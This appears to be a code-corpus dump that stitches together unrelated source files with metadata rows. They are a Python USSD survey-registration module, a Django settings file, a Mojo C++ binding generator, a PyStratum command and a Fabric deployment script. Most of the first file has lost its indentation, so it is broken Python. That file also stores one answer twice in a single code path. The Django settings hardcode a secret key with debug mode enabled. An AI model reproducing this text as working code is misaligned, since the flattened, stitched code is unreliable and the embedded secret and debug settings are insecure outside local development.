self.is_head = is_head
except KeyError:
pass
def set_is_selecting_member(self):
try:
is_selecting_member = self.investigator.get_from_cache('is_selecting_member')
if is_selecting_member is not None:
self.is_selecting_member = is_selecting_member
except KeyError:
self.investigator.set_in_cache('is_selecting_member', False)
def set_head(self, answer):
if self.is_head is None or not self.is_head:
if answer == self.HEAD_ANSWER['HEAD']:
self.investigator.set_in_cache('is_head', True)
else:
self.investigator.set_in_cache('is_head', False)
self.is_head = self.investigator.get_from_cache('is_head')
self.investigator.set_in_cache('is_selecting_member', False)
def start(self, answer):
self.register_households(answer)
self.set_in_session('QUESTION', self.question)
return self.action, self.responseString
def render_questions_based_on_head_selection(self, answer):
if self.household.get_head():
self.render_questions_or_member_selection(answer)
else:
self.render_select_member_or_head()
def validate_house_selection(self):
if self.is_invalid_response():
self.get_household_list()
else:
self.investigator.set_in_cache('HOUSEHOLD', self.household)
def register_households(self, answer):
if not self.household and self.is_browsing_households_list(answer):
self.get_household_list()
elif self.household:
if self.is_selecting_member:
self.set_head(answer)
response = self.render_registration_options(answer)
if not response is None:
self.responseString += response
else:
if not self.is_resuming_survey:
self.select_household(answer)
self.validate_house_selection()
else:
self.household = self.investigator.get_from_cache('HOUSEHOLD')
if self.household:
self.render_questions_based_on_head_selection(answer)
def render_select_member_or_head(self):
self.investigator.set_in_cache('is_selecting_member', True)
self.responseString = self.MESSAGES['SELECT_HEAD_OR_MEMBER'] % str(self.household.random_sample_number)
def render_questions_or_member_selection(self, answer):
if self.household.get_head():
self.investigator.set_in_cache('is_head', False)
self.responseString = USSD.MESSAGES['HEAD_REGISTERED']
self.responseString += self.render_questions(answer)
else:
self.render_select_member_or_head()
def render_questions(self, answer):
all_questions = Question.objects.filter(group__name="REGISTRATION GROUP").order_by('order')
if not self.question:
self.investigator.set_in_cache('INVALID_ANSWER', [])
self.question = all_questions[0]
else:
self.question = self.process_registration_answer(answer)
page = self.get_from_session('PAGE')
self.add_question_prefix()
return self.question.to_ussd(page) if self.question else None
def render_registration_options(self, answer):
if self.household_member:
if answer == self.ANSWER['YES']:
self.household = self.investigator.get_from_cache('HOUSEHOLD')
self.render_questions_or_member_selection(answer)
if answer == self.ANSWER['NO']:
self.investigator.clear_interview_caches()
self.set_in_session('HOUSEHOLD', None)
self.responseString = self.render_menu()
self.set_in_session('HOUSEHOLD_MEMBER', None)
else:
return self.render_questions(answer)
def process_registration_answer(self, answer):
answer = int(answer) if answer.isdigit() else answer
if not answer and answer != 0:
self.investigator.invalid_answer(self.question)
return self.question
if self.question.is_multichoice() and self.is_pagination_option(answer):
self.set_current_page(answer)
self.investigator.remove_ussd_variable('INVALID_ANSWER', self.question)
return self.question
age_question = Question.objects.get(text__startswith="Please Enter the age")
if self.is_year_question_answered() and not self.age_validates(answer):
self.investigator.invalid_answer(age_question)
return age_question
return self.get_next_question(answer)
    def get_next_question(self, answer):
        try:
            next_question = self.next_question_by_rule(answer)
        except ObjectDoesNotExist, e:
            # No branching rule matched: store the answer first (the
            # order-based lookup below may finish registration and read it
            # back), then fall back to plain question ordering.
            self.save_in_registration_dict(answer)
            next_question = self.next_question_by_order()
        self.save_in_registration_dict(answer)
        return next_question
def next_question_by_rule(self, answer):
answer_class = self.question.answer_class()
if self.question.is_multichoice():
answer = self.question.get_option(answer, self.investigator)
if not answer:
return self.question
_answer = answer_class(answer=answer)
next_question = self.question.get_next_question_by_rule(_answer, self.investigator)
if next_question != self.question:
next_question.order = self.question.order
return next_question
def next_question_by_order(self):
next_questions = Question.objects.filter(group__name="REGISTRATION GROUP",
order__gte=self.question.order + 1).order_by('order')
if not next_questions:
self.save_member_and_clear_cache()
return None
return next_questions[0]
def save_in_registration_dict(self, answer):
self.REGISTRATION_DICT[self.question.text] = answer
self.investigator.set_in_cache('registration_dict', self.REGISTRATION_DICT)
def save_member_and_clear_cache(self):
self.save_member_object()
self.investigator.clear_all_cache_fields_except('IS_REGISTERING_HOUSEHOLD')
self.investigator.set_in_cache('HOUSEHOLD', self.household)
self.responseString = USSD.MESSAGES['END_REGISTRATION']
def process_member_attributes(self):
member_dict = {}
name_question = Question.objects.get(text__startswith="Please Enter the name")
age_question = Question.objects.get(text__startswith="Please Enter the age")
gender_question = Question.objects.get(text__startswith="Please Enter the gender")
month_of_birth_question = Question.objects.get(text__startswith="Please Enter the month of birth")
month_of_birth = self.REGISTRATION_DICT[month_of_birth_question.text]
member_dict['surname'] = self.REGISTRATION_DICT[name_question.text]
member_dict['male'] = self.format_gender_response(gender_question)
member_dict['date_of_birth'] = self.format_age_to_date_of_birth(age_question, month_of_birth)
year_of_birth_question = Question.objects.get(text__startswith="Please Enter the year of birth")
year_of_birth = self.REGISTRATION_DICT[year_of_birth_question.text]
attributes = {'MONTH': month_of_birth,
'YEAR': year_of_birth}
return member_dict, attributes
def save_member_object(self):
member_dict, unknown_attributes = self.process_member_attributes()
member = self.save_member(member_dict)
self.save_unknown_dob_attributes(member, unknown_attributes)
self.set_in_session('HOUSEHOLD_MEMBER', member)
def save_unknown_dob_attributes(self, member, unknown_attributes):
for type_, attribute in unknown_attributes.items():
self.save_attribute(type_, attribute, member)
def save_attribute(self, type_, attribute, member):
if attribute == self.UNKNOWN:
UnknownDOBAttribute.objects.create(household_member=member, type=type_)
def save_member(self, member_dict):
object_to_create = HouseholdHead if self.is_head else HouseholdMember
return object_to_create.objects.create(surname=member_dict['surname'], male=member_dict['male'],
date_of_birth=str(member_dict['date_of_birth']), household=self.household)
def format_age_to_date_of_birth(self, age_question, month_of_birth):
age = self.REGISTRATION_DICT[age_question.text]
today = datetime.date.today()
date_of_birth = today.replace(year=(today.year - int(age)))
if month_of_birth != self.UNKNOWN:
year = date_of_birth.year
month = int(month_of_birth)
day = min(today.day, monthrange(year, month)[1])
date_of_birth = datetime.date(year=year, month=month, day=day)
return date_of_birth
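    # Worked example of the arithmetic above (stdlib only; the dates are
    # illustrative, not taken from real survey data):
    #
    #   today = datetime.date(2013, 5, 31); age, month = 30, 2
    #   year = today.year - int(age)                       # 1983
    #   day = min(today.day, monthrange(year, month)[1])   # 28 (Feb 1983)
    #   datetime.date(year, month, day)                    # -> 1983-02-28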
def format_gender_response(self, question):
return self.REGISTRATION_DICT[question.text] == 1
def is_year_question_answered(self):
return "year of birth" in self.question.text
def age_validates(self, answer):
if answer != self.UNKNOWN:
age_question = Question.objects.get(text__startswith="Please Enter the age")
given_age = self.REGISTRATION_DICT[age_question.text]
inferred_year_of_birth = datetime.date.today().year - int(given_age)
return inferred_year_of_birth == int(answer)
        return True
| bsd-3-clause | -4,769,370,553,601,594,000 | 41.283019 | 121 | 0.632453 | false | 3.855471 | false | false | false |
dgeorgievd/ovirtctl | api/api/settings.py | 1 | 3179 | """
Django settings for api project.
Generated by 'django-admin startproject' using Django 1.9.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=pe$t0a2dgf%ghj(b$suu2=4vi0x^uq6=l82qn1fx=fe52uym5'
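# One way to keep the key out of version control (a sketch, not wired up here):
#
#   SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', SECRET_KEY)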
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
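# A possible production override (sketch only; the PostgreSQL engine and the
# environment variable names are assumptions, not part of this project):
#
#   DATABASES['default'] = {
#       'ENGINE': 'django.db.backends.postgresql_psycopg2',
#       'NAME': os.environ.get('DB_NAME', 'api'),
#       'USER': os.environ.get('DB_USER', 'api'),
#       'PASSWORD': os.environ.get('DB_PASSWORD', ''),
#       'HOST': os.environ.get('DB_HOST', 'localhost'),
#       'PORT': os.environ.get('DB_PORT', '5432'),
#   }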
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| apache-2.0 | -3,422,961,035,196,886,500 | 25.057377 | 91 | 0.68921 | false | 3.520487 | false | false | false |
GladeRom/android_external_chromium_org | mojo/public/tools/bindings/generators/mojom_cpp_generator.py | 25 | 12218 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates C++ source files from a mojom.Module."""
import mojom.generate.generator as generator
import mojom.generate.module as mojom
import mojom.generate.pack as pack
from mojom.generate.template_expander import UseJinja
_kind_to_cpp_type = {
mojom.BOOL: "bool",
mojom.INT8: "int8_t",
mojom.UINT8: "uint8_t",
mojom.INT16: "int16_t",
mojom.UINT16: "uint16_t",
mojom.INT32: "int32_t",
mojom.UINT32: "uint32_t",
mojom.FLOAT: "float",
mojom.HANDLE: "mojo::Handle",
mojom.DCPIPE: "mojo::DataPipeConsumerHandle",
mojom.DPPIPE: "mojo::DataPipeProducerHandle",
mojom.MSGPIPE: "mojo::MessagePipeHandle",
mojom.SHAREDBUFFER: "mojo::SharedBufferHandle",
mojom.NULLABLE_HANDLE: "mojo::Handle",
mojom.NULLABLE_DCPIPE: "mojo::DataPipeConsumerHandle",
mojom.NULLABLE_DPPIPE: "mojo::DataPipeProducerHandle",
mojom.NULLABLE_MSGPIPE: "mojo::MessagePipeHandle",
mojom.NULLABLE_SHAREDBUFFER: "mojo::SharedBufferHandle",
mojom.INT64: "int64_t",
mojom.UINT64: "uint64_t",
mojom.DOUBLE: "double",
}
_kind_to_cpp_literal_suffix = {
mojom.UINT8: "U",
mojom.UINT16: "U",
mojom.UINT32: "U",
mojom.FLOAT: "f",
mojom.UINT64: "ULL",
}
def ConstantValue(constant):
return ExpressionToText(constant.value, kind=constant.kind)
def DefaultValue(field):
if field.default:
if mojom.IsStructKind(field.kind):
assert field.default == "default"
return "%s::New()" % GetNameForKind(field.kind)
return ExpressionToText(field.default, kind=field.kind)
return ""
def NamespaceToArray(namespace):
return namespace.split('.') if namespace else []
def GetNameForKind(kind, internal = False):
parts = []
if kind.imported_from:
parts.extend(NamespaceToArray(kind.imported_from["namespace"]))
if internal:
parts.append("internal")
if kind.parent_kind:
parts.append(kind.parent_kind.name)
parts.append(kind.name)
return "::".join(parts)
def GetCppType(kind):
if mojom.IsStructKind(kind):
return "%s_Data*" % GetNameForKind(kind, internal=True)
if mojom.IsAnyArrayKind(kind):
return "mojo::internal::Array_Data<%s>*" % GetCppType(kind.kind)
if mojom.IsInterfaceKind(kind) or mojom.IsInterfaceRequestKind(kind):
return "mojo::MessagePipeHandle"
if mojom.IsEnumKind(kind):
return "int32_t"
if mojom.IsStringKind(kind):
return "mojo::internal::String_Data*"
return _kind_to_cpp_type[kind]
def GetCppPodType(kind):
if mojom.IsStringKind(kind):
return "char*"
return _kind_to_cpp_type[kind]
def GetCppArrayArgWrapperType(kind):
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStructKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsAnyArrayKind(kind):
return "mojo::Array<%s> " % GetCppArrayArgWrapperType(kind.kind)
if mojom.IsInterfaceKind(kind):
raise Exception("Arrays of interfaces not yet supported!")
if mojom.IsInterfaceRequestKind(kind):
raise Exception("Arrays of interface requests not yet supported!")
if mojom.IsStringKind(kind):
return "mojo::String"
if mojom.IsHandleKind(kind):
return "mojo::ScopedHandle"
if mojom.IsDataPipeConsumerKind(kind):
return "mojo::ScopedDataPipeConsumerHandle"
if mojom.IsDataPipeProducerKind(kind):
return "mojo::ScopedDataPipeProducerHandle"
if mojom.IsMessagePipeKind(kind):
return "mojo::ScopedMessagePipeHandle"
if mojom.IsSharedBufferKind(kind):
return "mojo::ScopedSharedBufferHandle"
return _kind_to_cpp_type[kind]
def GetCppResultWrapperType(kind):
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStructKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsAnyArrayKind(kind):
return "mojo::Array<%s>" % GetCppArrayArgWrapperType(kind.kind)
if mojom.IsInterfaceKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsInterfaceRequestKind(kind):
return "mojo::InterfaceRequest<%s>" % GetNameForKind(kind.kind)
if mojom.IsStringKind(kind):
return "mojo::String"
if mojom.IsHandleKind(kind):
return "mojo::ScopedHandle"
if mojom.IsDataPipeConsumerKind(kind):
return "mojo::ScopedDataPipeConsumerHandle"
if mojom.IsDataPipeProducerKind(kind):
return "mojo::ScopedDataPipeProducerHandle"
if mojom.IsMessagePipeKind(kind):
return "mojo::ScopedMessagePipeHandle"
if mojom.IsSharedBufferKind(kind):
return "mojo::ScopedSharedBufferHandle"
return _kind_to_cpp_type[kind]
def GetCppWrapperType(kind):
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStructKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsAnyArrayKind(kind):
return "mojo::Array<%s>" % GetCppArrayArgWrapperType(kind.kind)
if mojom.IsInterfaceKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsInterfaceRequestKind(kind):
raise Exception("InterfaceRequest fields not supported!")
if mojom.IsStringKind(kind):
return "mojo::String"
if mojom.IsHandleKind(kind):
return "mojo::ScopedHandle"
if mojom.IsDataPipeConsumerKind(kind):
return "mojo::ScopedDataPipeConsumerHandle"
if mojom.IsDataPipeProducerKind(kind):
return "mojo::ScopedDataPipeProducerHandle"
if mojom.IsMessagePipeKind(kind):
return "mojo::ScopedMessagePipeHandle"
if mojom.IsSharedBufferKind(kind):
return "mojo::ScopedSharedBufferHandle"
return _kind_to_cpp_type[kind]
def GetCppConstWrapperType(kind):
if mojom.IsStructKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsAnyArrayKind(kind):
return "mojo::Array<%s>" % GetCppArrayArgWrapperType(kind.kind)
if mojom.IsInterfaceKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsInterfaceRequestKind(kind):
return "mojo::InterfaceRequest<%s>" % GetNameForKind(kind.kind)
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStringKind(kind):
return "const mojo::String&"
if mojom.IsHandleKind(kind):
return "mojo::ScopedHandle"
if mojom.IsDataPipeConsumerKind(kind):
return "mojo::ScopedDataPipeConsumerHandle"
if mojom.IsDataPipeProducerKind(kind):
return "mojo::ScopedDataPipeProducerHandle"
if mojom.IsMessagePipeKind(kind):
return "mojo::ScopedMessagePipeHandle"
if mojom.IsSharedBufferKind(kind):
return "mojo::ScopedSharedBufferHandle"
if not kind in _kind_to_cpp_type:
print "missing:", kind.spec
return _kind_to_cpp_type[kind]
def GetCppFieldType(kind):
if mojom.IsStructKind(kind):
return ("mojo::internal::StructPointer<%s_Data>" %
GetNameForKind(kind, internal=True))
if mojom.IsAnyArrayKind(kind):
return "mojo::internal::ArrayPointer<%s>" % GetCppType(kind.kind)
if mojom.IsInterfaceKind(kind) or mojom.IsInterfaceRequestKind(kind):
return "mojo::MessagePipeHandle"
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStringKind(kind):
return "mojo::internal::StringPointer"
return _kind_to_cpp_type[kind]
def IsStructWithHandles(struct):
for pf in struct.packed.packed_fields:
if mojom.IsAnyHandleKind(pf.field.kind):
return True
return False
def TranslateConstants(token, kind):
if isinstance(token, mojom.NamedValue):
# Both variable and enum constants are constructed like:
# Namespace::Struct::CONSTANT_NAME
# For enums, CONSTANT_NAME is ENUM_NAME_ENUM_VALUE.
name = []
if token.imported_from:
name.extend(NamespaceToArray(token.namespace))
if token.parent_kind:
name.append(token.parent_kind.name)
if isinstance(token, mojom.EnumValue):
name.append(
"%s_%s" % (generator.CamelCaseToAllCaps(token.enum.name), token.name))
else:
name.append(token.name)
return "::".join(name)
  if isinstance(token, mojom.BuiltinValue):
    if token.value == "double.INFINITY" or token.value == "float.INFINITY":
      return "INFINITY"
    if token.value == "double.NEGATIVE_INFINITY" or \
       token.value == "float.NEGATIVE_INFINITY":
      return "-INFINITY"
    if token.value == "double.NAN" or token.value == "float.NAN":
      return "NAN"
  if kind is not None and mojom.IsFloatKind(kind):
    return token if token.isdigit() else token + "f"
  return '%s%s' % (token, _kind_to_cpp_literal_suffix.get(kind, ''))
def ExpressionToText(value, kind=None):
return TranslateConstants(value, kind)
def ShouldInlineStruct(struct):
# TODO(darin): Base this on the size of the wrapper class.
if len(struct.fields) > 4:
return False
for field in struct.fields:
if mojom.IsMoveOnlyKind(field.kind):
return False
return True
def GetArrayValidateParams(kind):
if not mojom.IsAnyArrayKind(kind) and not mojom.IsStringKind(kind):
return "mojo::internal::NoValidateParams"
if mojom.IsStringKind(kind):
expected_num_elements = 0
element_is_nullable = False
element_validate_params = "mojo::internal::NoValidateParams"
else:
expected_num_elements = generator.ExpectedArraySize(kind)
element_is_nullable = mojom.IsNullableKind(kind.kind)
element_validate_params = GetArrayValidateParams(kind.kind)
return "mojo::internal::ArrayValidateParams<%d, %s,\n%s> " % (
expected_num_elements,
'true' if element_is_nullable else 'false',
element_validate_params)
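# For illustration, the template above expands as follows for a hypothetical
# fixed array<int32, 3> parameter (derived from the code, shown unrolled):
#
#   mojo::internal::ArrayValidateParams<3, false,
#   mojo::internal::NoValidateParams>
#
# while a plain string yields ArrayValidateParams<0, false, NoValidateParams>.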
_HEADER_SIZE = 8
class Generator(generator.Generator):
cpp_filters = {
"constant_value": ConstantValue,
"cpp_const_wrapper_type": GetCppConstWrapperType,
"cpp_field_type": GetCppFieldType,
"cpp_pod_type": GetCppPodType,
"cpp_result_type": GetCppResultWrapperType,
"cpp_type": GetCppType,
"cpp_wrapper_type": GetCppWrapperType,
"default_value": DefaultValue,
"expected_array_size": generator.ExpectedArraySize,
"expression_to_text": ExpressionToText,
"get_array_validate_params": GetArrayValidateParams,
"get_name_for_kind": GetNameForKind,
"get_pad": pack.GetPad,
"has_callbacks": mojom.HasCallbacks,
"should_inline": ShouldInlineStruct,
"is_any_array_kind": mojom.IsAnyArrayKind,
"is_enum_kind": mojom.IsEnumKind,
"is_move_only_kind": mojom.IsMoveOnlyKind,
"is_any_handle_kind": mojom.IsAnyHandleKind,
"is_interface_kind": mojom.IsInterfaceKind,
"is_interface_request_kind": mojom.IsInterfaceRequestKind,
"is_nullable_kind": mojom.IsNullableKind,
"is_object_kind": mojom.IsObjectKind,
"is_string_kind": mojom.IsStringKind,
"is_struct_with_handles": IsStructWithHandles,
"struct_size": lambda ps: ps.GetTotalSize() + _HEADER_SIZE,
"struct_from_method": generator.GetStructFromMethod,
"response_struct_from_method": generator.GetResponseStructFromMethod,
"stylize_method": generator.StudlyCapsToCamel,
"to_all_caps": generator.CamelCaseToAllCaps,
}
def GetJinjaExports(self):
return {
"module": self.module,
"namespace": self.module.namespace,
"namespaces_as_array": NamespaceToArray(self.module.namespace),
"imports": self.module.imports,
"kinds": self.module.kinds,
"enums": self.module.enums,
"structs": self.GetStructs(),
"interfaces": self.module.interfaces,
}
@UseJinja("cpp_templates/module.h.tmpl", filters=cpp_filters)
def GenerateModuleHeader(self):
return self.GetJinjaExports()
@UseJinja("cpp_templates/module-internal.h.tmpl", filters=cpp_filters)
def GenerateModuleInternalHeader(self):
return self.GetJinjaExports()
@UseJinja("cpp_templates/module.cc.tmpl", filters=cpp_filters)
def GenerateModuleSource(self):
return self.GetJinjaExports()
def GenerateFiles(self, args):
self.Write(self.GenerateModuleHeader(), "%s.h" % self.module.name)
self.Write(self.GenerateModuleInternalHeader(),
"%s-internal.h" % self.module.name)
self.Write(self.GenerateModuleSource(), "%s.cc" % self.module.name)
| bsd-3-clause | -2,157,970,695,015,137,000 | 35.363095 | 80 | 0.704207 | false | 3.287944 | false | false | false |
SetBased/py-stratum | pystratum/command/PyStratumCommand.py | 1 | 1572 | """
PyStratum
"""
from cleo import Command, Input, Output
from pystratum.style.PyStratumStyle import PyStratumStyle
class PyStratumCommand(Command):
"""
Loads stored routines and generates a wrapper class
stratum
{config_file : The stratum configuration file}
{file_names?* : Sources with stored routines}
"""
# ------------------------------------------------------------------------------------------------------------------
def execute(self, input_object: Input, output_object: Output) -> int:
"""
Executes this command.
"""
self.input = input_object
self.output = output_object
return self.handle()
# ------------------------------------------------------------------------------------------------------------------
def handle(self) -> int:
"""
Executes the actual Stratum program.
"""
self.output = PyStratumStyle(self.input, self.output)
command = self.get_application().find('constants')
ret = command.execute(self.input, self.output)
if ret:
return ret
command = self.get_application().find('loader')
ret = command.execute(self.input, self.output)
if ret:
return ret
command = self.get_application().find('wrapper')
ret = command.execute(self.input, self.output)
self.output.writeln('')
return ret
# ----------------------------------------------------------------------------------------------------------------------
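# Example invocation (a sketch; the console-script name and the configuration
# file path are assumptions):
#
#   pystratum stratum etc/stratum.cfg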
| mit | 4,108,116,907,794,490,400 | 29.230769 | 120 | 0.465649 | false | 5.154098 | false | false | false |
twistsys/basic-project | fabfile.py | 1 | 5267 | import os
import deploy as deploy_conf
from fabric.api import env, task, roles, run, execute, sudo
from fabric import colors
from fabric.utils import abort
import inspect
################################################################################
# Tasks for managing Deploy Targets
################################################################################
@task(alias='t')
def target(target_name):
"""Select the deploy target.
"""
if not target_name in deploy_conf.TARGETS:
abort('Deploy target "%s" not found.' % target_name)
target_class = deploy_conf.TARGETS[target_name]
target = target_class()
env['deploy_target'] = target
env.roledefs.update(target.get_roles())
print (colors.green("Selected deploy target ")
+ colors.green(target_name, bold=True))
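# Typical invocation, combining the alias above with a deploy; the target name
# "production" is only an example and must exist in deploy.TARGETS:
#
#   fab t:production deploy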
@task
def list_targets():
"""List all the available targets
"""
targets = deploy_conf.TARGETS.keys()
print 'Available targets:'
print '\n'.join(targets)
################################################################################
# Auxiliary tasks
################################################################################
@task()
@roles('app', 'db', 'static')
def git_pull():
"""Pull changes to the repository of all remote hosts.
"""
env.deploy_target.git_pull()
@task
@roles('app', 'db', 'static')
def setup_repository(force=False):
"""Clone the remote repository, creating the SSH keys if necessary.
"""
env.deploy_target.setup_repository(force)
@task
@roles('app', 'db', 'static')
def setup_virtualenv(force=False):
"""Create the virtualenv and install the packages from the requirements
file.
"""
env.deploy_target.setup_virtualenv(force)
env.deploy_target.install_virtualenv(update=False)
@task
@roles('app', 'db', 'static')
def update_virtualenv():
"""Update the virtualenv according to the requirements file.
"""
env.deploy_target.install_virtualenv(update=True)
################################################################################
# Main Tasks
################################################################################
@task
@roles('app')
def restart_app():
"""Restart the application server.
"""
env.deploy_target.restart_app()
@task()
def deploy():
"""Deploy the application to the selected deploy target.
"""
# Push local changes to central repository
env.deploy_target.git_push()
# Pull changes on remote repositories
execute(git_pull)
# Restart application server
execute(restart_app)
@task
@roles('db')
def migrate(syncdb=False, fake=False):
"""Execute syncdb and migrate in the database hosts.
"""
env.deploy_target.db_migrate(syncdb, fake)
@task
@roles('static')
def collectstatic():
"""Execute collectstatic on static file hosts.
"""
env.deploy_target.db_collectstatic()
@task()
def setup():
"""Initial setup of the remote hosts.
"""
# Set up git repository
execute(setup_repository)
# Set up virtualenv
execute(setup_virtualenv)
# Sync and Migrate database
execute(migrate, True, True)
# Collect static files
execute(collectstatic)
# Restart application servers
execute(restart_app)
################################################################################
# Tasks for manually executing manage.py commands
################################################################################
@task
@roles('app')
def app_manage(arguments):
"""Execute the given manage.py command in Aplication hosts.
"""
env.deploy_target.run_django_manage(arguments)
@task
@roles('db')
def db_manage(arguments):
"""Execute the given manage.py command in Database hosts.
"""
env.deploy_target.run_django_manage(arguments)
@task
@roles('static')
def static_manage(arguments):
"""Execute the given manage.py command in Static File hosts.
"""
env.deploy_target.run_django_manage(arguments)
################################################################################
# Auxiliary tasks for helping with SSH public key authentication
################################################################################
def _read_key_file(key_file):
"""Helper function that returns your SSH public from the given filename.
"""
key_file = os.path.expanduser(key_file)
if not key_file.endswith('pub'):
raise RuntimeWarning('Trying to push non-public part of key pair')
with open(key_file) as f:
return f.read().strip()
@task
def push_key(keyfile='~/.ssh/id_rsa.pub'):
"""Adds your private key to the list of authorized keys to log into the
remote account.
"""
key = _read_key_file(keyfile)
run('mkdir -p ~/.ssh && chmod 0700 ~/.ssh')
run("echo '" + key + "' >> ~/.ssh/authorized_keys")
@task
def push_key_sudo(user, keyfile='~/.ssh/id_rsa.pub'):
    """Adds your public key to the list of authorized keys for another
    account on the remote host, via sudo.
"""
key = _read_key_file(keyfile)
sudo('mkdir -p ~%(user)s/.ssh && chmod 0700 ~%(user)s/.ssh'%{'user': user},
user=user)
sudo("echo '" + key + "' >> ~%(user)s/.ssh/authorized_keys"%{'user': user},
user=user)
| bsd-3-clause | -6,034,000,824,672,719,000 | 27.781421 | 80 | 0.562369 | false | 4.240741 | false | false | false |